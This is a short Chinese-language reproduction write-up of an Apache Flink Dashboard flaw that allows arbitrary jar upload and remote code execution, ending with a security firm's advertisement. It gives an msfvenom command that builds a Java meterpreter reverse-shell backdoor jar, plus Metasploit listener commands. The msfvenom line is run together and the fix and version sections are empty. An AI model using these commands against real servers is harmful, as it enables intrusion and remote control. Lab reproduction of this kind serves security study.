简介
1.漏洞概述
攻击者可直接在Apache Flink Dashboard页面中上传任意jar包,从而达到远程代码执行的目的。
2.影响版本
3.环境搭建
4.漏洞复现
1)tar -zxvf flink-1.9.1-bin-scala_2.11.tgz
2)到bin文件夹运行./start-cluster.sh
3)环境搭建成功 目标站点 http://127.0.0.1:8081
4)生成jar后门包
msfvenompjava/meterpreter/reverse_tcpLHOST=192.168.115.16 LPORT=2019 -f jar > sylon.jar
5)攻击机访问目标站点 并上传sylon.jar
6)配置监听
use exploit/multi/handler
set payload java/shell/reverse_tcp
set LHOST 192.168.115.16
set LPORT 2019
show options
run
7)漏洞触发
5.修复方案
6.参考链接
https://twitter.com/jas502n/status/1193869996717297664
河北镌远网络科技有限公司(Hebei JYCYBER TechnologyCo.,Ltd.)是一家集人才、技术和经验于一体的,提供全面网络安全解决方案的专业服务商。镌远科技致力于为各行业的网络安全需求提供软件研发和通用解决方案,业务领域主要包括基础服务、咨询业务、产品研发和安全培训四大版块,各版块相互独立又相辅相成,完美阐释了“专业服务、全程服务、延伸服务”的服务体系和“单一业务与长远目标相融合”的服务理念。
关注镌远科技,关注网络安全!
河北地址:河北镌远网络科技有限公司
河北省邯郸市丛台区中华北大街193号慧谷大厦14层
总部地址:北京冠程科技有限公司
北京市昌平区科技园区东区产业基地企业墅上区一号楼九单元四层
实训基地:河北省石家庄市电子信息学校冠程科技研究与实训中心
欢迎扫描关注我们,及时了解更多关于网络安全相关知识